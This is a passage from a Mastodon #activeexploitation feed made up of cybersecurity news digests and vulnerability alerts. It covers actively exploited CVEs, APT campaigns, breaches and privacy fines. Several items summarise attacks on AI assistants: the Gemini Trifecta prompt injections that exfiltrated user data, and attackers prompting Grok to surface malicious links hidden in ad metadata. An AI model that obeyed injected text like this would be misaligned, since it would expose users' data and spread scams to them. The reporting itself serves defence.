- Phantom Taurus primarily gains initial access by exploiting known vulnerabilities in internet-facing devices, underscoring the importance of timely patching even against advanced threats.

🀫 CyberScoop | cyberscoop.com/phantom-taurus-

North Korean IT Worker Scheme Expands Globally πŸ‡°πŸ‡΅

- Okta's research reveals North Korea is significantly expanding its illicit IT worker scheme beyond the US tech sector, now targeting dozens of industries and countries worldwide, including finance, healthcare, and government.
- These workers use fake or stolen identities to secure high-paying remote roles, aiming to circumvent sanctions and generate millions for Pyongyang's military, with a notable increase in applications for AI-focused positions.
- The campaign's evolution into new markets, coupled with increased pressure from law enforcement, suggests North Korean threat actors may increasingly resort to ransomware, data theft, and extortion tactics.

πŸ—žοΈ The Record | therecord.media/north-korea-it

MatrixPDF Toolkit Weaponises PDFs for Phishing 🎣

- A new toolkit called MatrixPDF is being sold on cybercrime forums, enabling attackers to transform ordinary PDF files into interactive phishing and malware lures that bypass email security.
- The tool allows embedding blurred content, fake "Secure Document" prompts, and clickable overlays that redirect victims to credential theft pages or malware downloads, leveraging JavaScript actions.
- MatrixPDF's design cleverly bypasses Gmail's phishing filters by not containing malicious binaries directly, instead relying on user interaction to open external malicious links, making it a potent new threat.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

Google Drive Integrates AI for Ransomware Detection πŸ›‘οΈ

- Google has rolled out a new AI tool in Drive for desktop designed to detect ransomware activity, such as mass file encryption, and automatically pause syncing to limit damage spread.
- The model, trained on millions of real-world ransomware samples and leveraging VirusTotal threat intelligence, aims to provide early alerts and facilitate file restoration with a few clicks.
- While a significant defensive layer, Google clarifies this is not a silver bullet to prevent ransomware outright but rather to mitigate its impact, working in conjunction with traditional antivirus solutions.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

Anthropic Enhances Claude Sonnet 4.5 for Safety and Security πŸ€–

- Anthropic has released Claude Sonnet 4.5, touting significant improvements in safety and security, including enhanced defences against prompt injection attacks and reduced concerning behaviours like sycophancy and deception.
- The model underwent AI Safety Level 3 training, incorporating increased internal security measures and safeguards to limit jailbreaking and refusal of harmful queries, particularly around weapons and influence operations.
- Sonnet 4.5 also shows "meaningful" improvements in defensive cybersecurity tasks like vulnerability discovery and code analysis, though it still operates "well below" the capabilities for autonomous end-to-end cyber operations.

🀫 CyberScoop | cyberscoop.com/anthrophic-sonn

Cisco ASA/FTD Flaws Actively Exploited, Thousands Remain Vulnerable 🚨

- Nearly 50,000 Cisco Adaptive Security Appliance (ASA) and Firewall Threat Defense (FTD) instances remain internet-exposed and vulnerable to CVE-2025-20333 (RCE) and CVE-2025-20362 (VPN access bypass), which are actively exploited.
- Despite Cisco's warnings and a rare 24-hour CISA emergency directive for federal agencies to patch, a significant number of devices, particularly in the US, are yet to be secured.
- Attackers, potentially linked to the sophisticated ArcaneDoor campaign, are deploying 'RayInitiator' bootkit and 'Line Viper' shellcode loader, highlighting an advanced evolution in tradecraft targeting end-of-life or soon-to-be end-of-life devices.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

Critical Sudo Flaw Under Active Exploitation 🐧

- CISA has added CVE-2025-32463, a critical privilege escalation vulnerability in the Linux Sudo package, to its Known Exploited Vulnerabilities catalog due to active exploitation.
- This flaw allows local attackers to execute arbitrary commands as root using the -R (--chroot) option, even if they are not listed in the sudoers file, affecting Sudo versions 1.9.14 through 1.9.17.
- Federal agencies have until October 20 to apply mitigations or discontinue Sudo use, underscoring the urgency for all organisations to patch immediately.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ“° The Hacker News | thehackernews.com/2025/09/cisa

Fortra GoAnywhere MFT Vulnerability Actively Exploited πŸ“

- CISA has ordered federal agencies to patch CVE-2025-10035, a critical deserialization vulnerability (CVSS 10.0) in Fortra's GoAnywhere MFT solution, due to strong indications of active exploitation.
- The flaw primarily affects organisations with an internet-exposed GoAnywhere admin console and could lead to command injection, reminiscent of a 2023 GoAnywhere vulnerability exploited by ransomware gangs like Clop.
- Fortra has released a patch and mitigation guidance, urging customers to review configurations and remove public access from the Admin Console, despite not explicitly confirming in-the-wild exploitation.

πŸ—žοΈ The Record | therecord.media/cisa-orders-fe
πŸ“° The Hacker News | thehackernews.com/2025/09/fort

Broadcom Patches Actively Exploited VMware Zero-Day and NSA-Reported Flaws ☁️

- Broadcom has patched CVE-2025-41244, a high-severity privilege escalation vulnerability in VMware Aria Operations and VMware Tools, which has been exploited as a zero-day by the Chinese state-sponsored threat actor UNC5174 since October 2024.
- UNC5174 leverages this flaw by staging a malicious binary in common paths like /tmp/httpd, which is then picked up by VMware service discovery, leading to root-level code execution.
- Additionally, Broadcom fixed two high-severity VMware NSX username enumeration vulnerabilities (CVE-2025-41251, CVE-2025-41252) reported by the NSA, which could facilitate brute-force attacks.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

Google Gemini AI Flaws Disclosed 🧠

- Researchers have uncovered and Google has patched three "Gemini Trifecta" vulnerabilities in Google's Gemini AI assistant, which could have led to significant privacy risks and data theft.
- Flaws included prompt injection in Gemini Cloud Assist (exploiting log summarisation to compromise cloud resources), search-injection in Gemini Search Personalization (manipulating Chrome search history to leak user data), and indirect prompt injection in Gemini Browsing Tool (exfiltrating user data to external servers).
- These vulnerabilities highlight that AI itself can be an attack vector, not just a target, underscoring the need for robust security in AI adoption.

πŸ“° The Hacker News | thehackernews.com/2025/09/rese

FTC Sues Sendit App for Child Data Collection and Deceptive Practices πŸ§’

- The FTC is suing Sendit, a popular social media companion app, and its CEO for allegedly violating COPPA by illegally collecting personal data (phone numbers, birthdates, photos, social media usernames) from over 116,000 US children under 13 without parental consent.
- The lawsuit also alleges deceptive practices, including generating fake, provocative anonymous messages to trick users into purchasing a "Diamond Membership" for up to $9.99 a week, falsely promising to reveal sender identities.
- These actions highlight serious concerns about child online privacy and manipulative subscription models, with the FTC seeking to hold the company accountable under COPPA, the FTC Act, and ROSCA.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/lega
πŸ—žοΈ The Record | therecord.media/ftc-alleges-se

Imgur Blocks UK Users Following Data Watchdog Fine Warning πŸ‡¬πŸ‡§

- Imgur has blocked access for all users in the United Kingdom after the Information Commissioner's Office (ICO) issued a notice of intent to fine its parent company, MediaLab, over concerns about protecting children's data under the Online Safety Act.
- The geoblock means UK users cannot log in, view content, or upload images, and embedded Imgur content on third-party sites is also unavailable, causing widespread impact.
- The ICO warns that blocking UK users does not exempt Imgur from any previously imposed fines, highlighting the serious consequences of non-compliance with data protection regulations.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/tech

#CyberSecurity #ThreatIntelligence #Vulnerabilities #ZeroDay #ActiveExploitation #Ransomware #APT #NationState #DataPrivacy #Regulatory #CISA #AI #Phishing #Malware #CryptoCrime #InfoSec #IncidentResponse

SOC Goulashsoc_goulash@infosec.exchange
2025-09-24

It's been a busy 24 hours in the cyber world with significant updates on nation-state activity, actively exploited vulnerabilities, major law enforcement action, and a stark reminder about the basics of cyber hygiene. Let's dive in:

Recent Attacks & Breaches ⚠️

- A 19-year-old UK national, Thalha Jubair, a core member of the Scattered Spider group, has been arrested, linked to over 120 cyberattacks and $89.5 million in crypto theft.
- The UK's National Crime Agency arrested a suspect in connection with the RTX ransomware attack that caused widespread disruptions at European airports by impacting Collins Aerospace's MUSE passenger processing software.
- Boyd Gaming, a major US casino operator, disclosed a data breach following a cyberattack that compromised employee and other individual data, though operations were not materially impacted.
- KNP Logistics Group, a 158-year-old UK business, collapsed after an Akira ransomware attack gained initial access via a weak password, destroying backups and leading to 700 job losses.
- Phishing campaigns are targeting GitHub users with fake Y Combinator invitations to drain crypto wallets and Python developers with fraudulent PyPI sites to steal credentials, posing a significant supply chain risk.

🀫 CyberScoop | cyberscoop.com/thalha-jubair-u
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ“° The Hacker News | thehackernews.com/2025/09/how-
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

Chinese APTs: BRICKSTORM & RedNovember Espionage πŸ‡¨πŸ‡³

- Mandiant and Google Threat Intelligence are tracking a "next-level" Chinese cyberespionage campaign using the sophisticated BRICKSTORM backdoor, with average dwell times of 400 days in victim networks.
- UNC5221, a China-linked group, is deploying BRICKSTORM on appliances lacking EDR (like VMware vCenter/ESXi hosts) to steal intellectual property, develop zero-days, and establish pivot points to downstream victims.
- Another Chinese state-sponsored group, RedNovember (TAG-100/Storm-2077), is targeting global governments and private sectors (defense, aerospace, law firms) using the Go-based Pantegana backdoor and Cobalt Strike, often exploiting perimeter appliance vulnerabilities.

🀫 CyberScoop | cyberscoop.com/chinese-cyberes
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ—žοΈ The Record | therecord.media/china-linked-h
πŸ“° The Hacker News | thehackernews.com/2025/09/chin

Zero-Days & Critical Flaws Under Attack 🚨

- Cisco has released patches for a high-severity zero-day (CVE-2025-20352) in IOS/IOS XE SNMP subsystem, actively exploited for DoS or root-level RCE; immediate patching or SNMP access limitation is crucial.
- State-sponsored actors are exploiting CVE-2025-59689, a command injection flaw in Libraesva Email Security Gateway (ESG), allowing arbitrary command execution via crafted compressed email attachments.
- Hackers are exploiting CVE-2025-51591, an SSRF flaw in the Pandoc utility, to target AWS IMDS and steal EC2 IAM credentials, though IMDSv2 enforcement can mitigate this.
- An unpatched flaw (CVE-2025-10184) in OnePlus OxygenOS allows any installed app to access SMS data and metadata without requiring permission, due to improper write permissions in the Telephony package.
- Two new Supermicro BMC firmware vulnerabilities (CVE-2024-10237 bypass, CVE-2025-6198) can create persistent backdoors by allowing malicious firmware updates and bypassing BMC Root of Trust.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ“° The Hacker News | thehackernews.com/2025/09/stat
πŸ“° The Hacker News | thehackernews.com/2025/09/hack
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

Global Cybercrime Crackdown πŸ’°

- Interpol's Operation HAECHI VI, involving 40 countries, seized over $439 million in cash and cryptocurrency from cyber-enabled financial crimes between April and August 2025.
- The operation led to 45 arrests, the blocking of 68,000 bank accounts, and the seizure of 400 cryptocurrency wallets, targeting various scams from phishing to money laundering.
- This marks a continuation of successful HAECHI operations, demonstrating the increasing effectiveness of international cooperation against cybercriminal rings.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

Kali Linux 2025.3 Released 🐧

- Kali Linux 2025.3 has been released, introducing ten new tools for web security auditing, AI agent integration, Kerberos relaying, and network pivoting.
- The update brings enhanced Wi-Fi features with Nexmon support for Broadcom and Cypress chips, now more accessible to Raspberry Pi and other devices.
- Kali NetHunter also received improvements, including support for Samsung S10 and new features for CARsenal, its car hacking toolkit.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

#CyberSecurity #ThreatIntelligence #Ransomware #APT #Espionage #ZeroDay #Vulnerability #ActiveExploitation #Phishing #SupplyChain #LawEnforcement #Cybercrime #InfoSec #IncidentResponse #KaliLinux

SOC Goulashsoc_goulash@infosec.exchange
2025-09-05

Alright team, it's been a pretty packed 24 hours in the cyber world! We've got some critical vulnerabilities under active exploitation, a few notable breaches, and some fascinating new research into AI's role in both defence and attack. Let's dive in:

Wealthsimple and Qantas Hit in Supply Chain Attacks πŸ’Έ

- Canadian financial firm Wealthsimple disclosed a data breach impacting less than 1% of its clients, with personal and financial data stolen. This incident is linked to the ongoing Salesforce/Salesloft supply-chain attacks by the ShinyHunters group.
- Australian airline Qantas also faced a breach in July, exposing data for 5.7 million people, and has now reduced executive bonuses by 15% in response. This breach is also attributed to the ShinyHunters group, leveraging Salesforce-connected platforms.
- These incidents highlight the severe downstream impact of supply chain compromises, particularly those involving widely used platforms like Salesforce and its integrations, underscoring the need for robust third-party risk management.

πŸ—žοΈ The Record | therecord.media/qantas-airline
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

GhostRedirector Hijacks Windows Servers for SEO Fraud πŸ‘»

- A new, possibly China-based group dubbed GhostRedirector has compromised at least 65 Windows servers globally, deploying Rungan and Gamshen backdoors.
- Gamshen, embedded in Microsoft IIS, manipulates Google search rankings to promote gambling websites, acting as an "SEO fraud-as-a-service" scheme.
- While not directly delivering malicious content to visitors, this activity damages the reputation of compromised sites and highlights the use of public exploits and privilege escalation to maintain persistence.

πŸ—žοΈ The Record | therecord.media/seo-scheme-win

Sitecore Zero-Day Exploited via Public Sample Keys ⚠️

- A ViewState deserialization vulnerability, CVE-2025-53690, in multiple Sitecore products (XM, XP, XC, Managed Cloud) is under active exploitation, leading to remote code execution (RCE).
- The flaw stems from customers using publicly documented sample machine keys from older deployment guides instead of generating unique ones, allowing attackers to deploy WEEPSTEEL malware for reconnaissance and achieve privilege escalation.
- CISA has added CVE-2025-53690 to its Known Exploited Vulnerabilities catalog, mandating federal agencies patch by September 25th, urging all affected organisations to rotate keys and monitor for suspicious activity immediately.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ—žοΈ The Record | therecord.media/cisa-orders-pa

Critical SAP S/4HANA Flaw Actively Exploited 🚨

- A critical command injection vulnerability, CVE-2025-42957 (CVSS 9.9), in SAP S/4HANA is being actively exploited in the wild, impacting both on-premise and Private Cloud editions.
- The flaw allows low-privileged users to inject arbitrary ABAP code, bypass authorization checks, and achieve full system compromise, including creating superuser accounts and manipulating critical business data.
- Organisations must apply SAP's August 2025 security updates immediately, implement SAP UCON to restrict RFC usage, and monitor for suspicious RFC calls or new admin users.

πŸ“° The Hacker News | thehackernews.com/2025/09/sap-
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

Max Severity Argo CD API Flaw Leaks Credentials πŸ”’

- A maximum severity (CVSS 10.0) vulnerability, CVE-2025-55190, in Argo CD allows API tokens with even low project-level 'get' permissions to retrieve all repository credentials (usernames, passwords) associated with a project.
- This flaw bypasses isolation mechanisms, enabling attackers to clone private codebases, inject malicious manifests, or pivot to other resources where credentials are reused.
- All Argo CD versions up to 2.13.0 are affected; administrators should upgrade to versions 3.1.2, 3.0.14, 2.14.16, or 2.13.9 immediately to mitigate this critical risk.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

Undetected SVG Phishing Pages Deliver Malware 🎣

- VirusTotal has identified 44 unique, previously undetected SVG files used in phishing campaigns impersonating the Colombian judicial system.
- These SVG files execute embedded JavaScript to decode and inject Base64-encoded HTML phishing pages, which then stealthily download ZIP archives containing malware like the Atomic macOS Stealer (AMOS) or StealC.
- Attackers are increasingly using "ClickFix" social engineering tactics and terminal-based installations to bypass macOS Gatekeeper protections, highlighting the need for defence-in-depth beyond OS-level controls.

πŸ“° The Hacker News | thehackernews.com/2025/09/viru

CastleRAT Malware Spreads via ClickFix Social Engineering 🏰

- The TAG-150 criminal group has developed CastleRAT malware in both Python and C variants, spreading through "ClickFix" social engineering tactics that trick users into pasting malicious commands.
- The Python variant is designed for stealth with low antivirus detection, while the C variant is more capable, harvesting keystrokes, taking screen captures, and establishing persistence.
- Operating as a malware-as-a-service, TAG-150's effective social engineering (28.7% success rate) and sophisticated infrastructure (Tox Chat C2, Google Cloud hosting) underscore the growing threat of user-initiated malware installations.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

The First AI-Powered Ransomware: PromptLock PoC πŸ€–

- NYU researchers developed "Ransomware 3.0," an AI system that autonomously performs all four phases of a ransomware attack, generating polymorphic, victim-specific Lua scripts and personalised ransom notes.
- This proof-of-concept, dubbed "PromptLock" by ESET after being uploaded to VirusTotal, demonstrated how AI can create highly targeted and difficult-to-detect ransomware.
- While the current binary won't function outside a lab, the ease with which AI models can generate malicious code for individual tasks, which then combine into a full attack, signals an inevitable future where AI-driven ransomware becomes a real-world threat.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

AI Agents Automate Android Bug Hunting πŸ“±

- Researchers from Nanjing University and The University of Sydney have developed A2, an AI agent system for automated vulnerability discovery and validation in Android apps.
- A2, using commercial AI models like OpenAI o3 and Gemini, emulates human bug hunters, achieving 78.3% coverage on the Ghera benchmark and finding 104 true-positive zero-day vulnerabilities in production APKs, 57 of which were self-validated with PoC exploits.
- This system significantly reduces false positives by validating findings, offering a cost-effective and fast alternative to traditional static analysis tools, and signals a potential "explosion" in both defensive research and offensive exploitation.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

Microsoft Enforces MFA for Azure Portal Sign-ins πŸ›‘οΈ

- Microsoft has successfully enforced multifactor authentication (MFA) for Azure Portal sign-ins across all tenants since March 2025, following earlier announcements.
- This initiative will expand to Azure CLI, PowerShell, SDKs, and APIs in October 2025, aiming to protect user accounts against cyber threats.
- MFA significantly reduces account compromise risk (by over 99%), reinforcing Microsoft's commitment to a more secure future by making strong authentication mandatory for administrative access.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/micr

#CyberSecurity #ThreatIntelligence #Vulnerability #RCE #ZeroDay #ActiveExploitation #Ransomware #Malware #APT #SupplyChainAttack #Phishing #SocialEngineering #AI #MFA #InfoSec #IncidentResponse

SOC Goulashsoc_goulash@infosec.exchange
2025-09-04

Hello cyber pros! It's been a busy 24 hours with some significant breaches, critical vulnerabilities, new threat actor tactics, and a flurry of data privacy and regulatory news. Let's dive in:

Recent Cyber Attacks and Breaches 🚨

- Tire giant Bridgestone Americas confirmed a cyberattack impacting some North American manufacturing facilities. The company believes its rapid response contained the incident early, preventing customer data theft or deep network infiltration.
- Texas is suing education tech provider PowerSchool following a December 2024 data breach that exposed sensitive information for 62.4 million students and 9.5 million teachers. The lawsuit alleges deceptive trade practices and failure to protect data, especially given the lack of MFA prior to the breach and subsequent extortion attempts despite a ransom payment.
- Chess.com disclosed a data breach affecting a third-party file transfer application, exposing personal identifiable information (PII) for over 4,500 users. The platform's core infrastructure and financial data were reportedly unaffected, and there's no evidence of public disclosure or misuse yet.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ—žοΈ The Record | therecord.media/powerschool-da
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ—žοΈ The Record | therecord.media/chess-platform

New Threat Research & Actor Activity πŸ•΅οΈβ€β™€οΈ

- Threat actors are "Grokking" X's AI assistant to bypass malvertising protections and spread malicious links. They hide links in video ad metadata, then prompt Grok to reveal them in a clickable format, leveraging Grok's trusted status to amplify scams and malware.
- Russian state-sponsored APT28 (aka Fancy Bear) is deploying a new Microsoft Outlook backdoor called "NotDoor" against companies in NATO countries. This VBA macro monitors incoming emails for trigger words, enabling data exfiltration, file uploads, and command execution, often delivered via DLL side-loading through onedrive.exe.
- A new China-aligned cybercrime group, GhostRedirector, has compromised at least 65 Windows servers globally using custom malware (Rungan backdoor and Gamshen IIS trojan) for SEO fraud. They manipulate Google search results to boost gambling site rankings by showing Googlebot fake backlinks and modified content.
- The US State Department has placed a $10 million bounty on three Russians accused of being FSB intelligence agents (Berserk Bear/Dragonfly) for attacking critical infrastructure. They allegedly exploited an old Cisco flaw (CVE-2018-0171) and deployed "SYNful Knock" malware to target energy companies and nuclear plants.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ“° The Hacker News | thehackernews.com/2025/09/cybe
πŸ“° The Hacker News | thehackernews.com/2025/09/russ
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

Vulnerabilities: Zero-Days & Active Exploitation ⚠️

- CISA has added two TP-Link router flaws, CVE-2023-50224 (authentication bypass) and CVE-2025-9377 (OS command injection), to its KEV catalog, confirming active exploitation by the Quad7 botnet. Additionally, a new unpatched zero-day (stack-based buffer overflow in CWMP) affecting multiple TP-Link router models (e.g., Archer AX10/AX1500) has been confirmed, allowing remote code execution.
- A critical zero-day vulnerability (CVE-2025-53690) in Sitecore, stemming from the reuse of sample ASP.NET machine keys from old documentation, has been actively exploited. Attackers leveraged this ViewState deserialization flaw to achieve remote code execution and deploy reconnaissance malware (WeepSteel), network tunneling tools (Earthworm), and remote access tools (Dwagent).

πŸ“° The Hacker News | thehackernews.com/2025/09/cisa
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
🀫 CyberScoop | cyberscoop.com/sitecore-zero-d
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

Threat Landscape Commentary πŸ‡ΊπŸ‡¦

- Ukraine's cyber chief, Oleksandr Potii, noted a decrease in "critical" Russian cyberattacks due to stronger Ukrainian defences, but an increase in non-critical operations like espionage and DDoS. He anticipates a return to targeting energy grids this winter, emphasising strong cooperation with US and European partners for intelligence sharing and tool deployment.

πŸ—žοΈ The Record | therecord.media/ukraine-cyber-

Data Privacy & Regulatory Fines πŸ”’

- The European General Court rejected a challenge to the EU-U.S. Data Privacy Framework (DPF), affirming that the US adequately safeguards Europeans' personal data. This decision provides relief and bolsters confidence for thousands of companies relying on the framework for data transfers.
- France's CNIL has levied significant fines against Google (€325 million) and SHEIN (€150 million) for violating cookie consent regulations. Both companies were found to have placed advertising cookies without proper user consent, and Google was also fined for displaying ads within Gmail without explicit permission.
- A US federal jury awarded $425 million against Google in a class-action lawsuit, finding the tech giant invaded the privacy of millions by collecting user data even after they had turned off app activity tracking. Google plans to appeal the decision.
- The US FTC has taken action against Disney ($10 million fine) and robot toy maker Apitor Technology for violating the Children's Online Privacy Protection Rule (COPPA). Disney failed to label "Made for Kids" YouTube videos, leading to data collection from children, while Apitor allowed a third-party to collect children's geolocation data without consent.

πŸ—žοΈ The Record | therecord.media/european-court
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ“° The Hacker News | thehackernews.com/2025/09/goog
πŸ—žοΈ The Record | therecord.media/shein-google-f
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ—žοΈ The Record | therecord.media/google-hit-wit

Regulatory Issues & Government Programs πŸ›οΈ

- A US Congressional panel has advanced two critical cyber bills, throwing a lifeline to threat intelligence sharing and state/local funding. The WIMWIG Act would extend the Cybersecurity Information Sharing Act of 2015 for 10 years, and the PILLAR Act would reauthorize the State and Local Cybersecurity Grant Program, both now including provisions for AI.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

#CyberSecurity #ThreatIntelligence #Ransomware #DataBreach #Vulnerability #ZeroDay #ActiveExploitation #APT #Malware #DataPrivacy #Regulatory #InfoSec #CyberAttack #IncidentResponse

Harry Sintonenharrysintonen@infosec.exchange
2025-04-16

Update your #Apple devices ASAP. Two vulnerabilities, CVE-2025-31200 and CVE-2025-31201, have been fixed: support.apple.com/en-us/122282

"Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on iOS."

While iOS has been known to be targeted, the fixes are available for all Apple devices and should be installed as soon as possible.

#activeexploitation #CVE_2025_31200 #CVE_2025_31201

RF Waverfwaveio@mstdn.ca
2025-03-02

Security researchers discover vulnerabilities in #Paragon Partition Manager driver used in #activeexploitation

The actively exploited vulnerability is tracked as CVE-2025-0289, and when exploited, allows an attacker to gain administrative privileges and to execute code. An attacker can potentially download the driver onto a device without Paragon Partition Manager installed.

Users are advised to patch ASAP, and to enable Vulnerable Driver Blocklist

#cybersecurity

bleepingcomputer.com/news/secu

RF Waverfwaveio@mstdn.ca
2025-01-31

Security researchers reveal #activeexploitation against #SimpleHelp RMM vulnerabilities

The vulnerabilities are tracked as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, and when exploited, allows an attacker to gain admin privileges

Administrators are advised to patch ASAP

#cybersecurity #vulnerabilitymanagement

bleepingcomputer.com/news/secu

tricia, queen of house cyberly :verified_paw: :donor:triciakickssaas@infosec.exchange
2025-01-28

pls appreciate i wore an aqua colored sweater to talk about aquabot

🚨Active exploitation attempt🚨
Akamai Security Intelligence and Response Team (SIRT) has identified a new variant of the Mirai-based Aquabot, dubbed Aquabotv3 keeping in line with the naming conventions of the first two.

it is using CVE-2024-41710, a command injection vulnerability that affects Mitel SIP models. There was a POC made public in august 2024 but this is the first time it's been seen actively seeking exploitation ITW.

not only that! This malware exhibits a behavior we have never before seen with a Mirai variant: a function (report_kill) to report back to the C2 when a kill signal was caught on the infected device.

We (we = the SIRT) have not seen any response from the C2 as of the date this was originally posted (Jan. 28, 2024).

Incredible work Larry Cashdollar and Kyle Lefton πŸŽ‰

Full technical analysis including IOCs:
akamai.com/blog/security-resea

#mirai #malware #activeexploitation #security #research #botnet

RF Waverfwaveio@mstdn.ca
2025-01-11

#Ivanti has revealed #activeexploitation against a vulnerability in its appliances

The vulnerability is tracked as CVE-2025-0282, and when exploited, allows an attacker to remotely execute code

Administrators are advised to patch ASAP

#cybersecurity

bleepingcomputer.com/news/secu

RF Waverfwaveio@mstdn.ca
2025-01-02

Security researchers reveal #activeexploitation of a vulnerability in #FourFaith routers

The vulnerability is tracked as CVE-2024-12856, and when exploited, allows an attacker to inject commands

Administrators are advised to reach out to their Four-Faith contacts for mitigation steps

#cybersecurity

bleepingcomputer.com/news/secu

RF Waverfwaveio@mstdn.ca
2024-12-29

#PaloAlto reveals #activeexploitation against vulnerability in its firewall

The vulnerability is tracked as CVE-2024-3393, and when exploited, causes the firewall to reboot

Administrators are advised to patch ASAP, or to apply mitigations if not able to patch

#cybersecurity

bleepingcomputer.com/news/secu

RF Waverfwaveio@mstdn.ca
2024-12-22

Security researchers reveal #activeexploitation against a critical #ApacheStruts 2 vulnerability

The vulnerability is tracked as CVE-2024-53677, and when exploited, can allow an attacker to remotely execute code

Administrators are advised to patch ASAP

#cybersecurity

bleepingcomputer.com/news/secu

Rene Robichaudnerowild
2024-12-05

CISA Warns of Active Exploitation of Flaws in Zyxel, ProjectSend, and CyberPanel
thehackernews.com/2024/12/cisa

RF Waverfwaveio@mstdn.ca
2024-11-27

Security researchers reveal #activeexploitation against critical vulnerability in Array Networks SSL VPN products

The vulnerability is tracked as CVE-2023-28461, and when exploited, allows an attacker to remotely execute code

Administrators are advised to patch ASAP

#cybersecurity #vulnerabilitymanagement

bleepingcomputer.com/news/secu

RF Waverfwaveio@mstdn.ca
2024-11-24

UPDATE: Security researchers reveal over 2000 Palo Alto firewalls have been compromised using these vulnerabilities

#activeexploitation

bleepingcomputer.com/news/secu

RF Waverfwaveio@mstdn.ca
2024-11-19

UPDATE: Broadcom is warning that they have observed #activeexploitation for this vulnerability

bleepingcomputer.com/news/secu

Client Info

Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst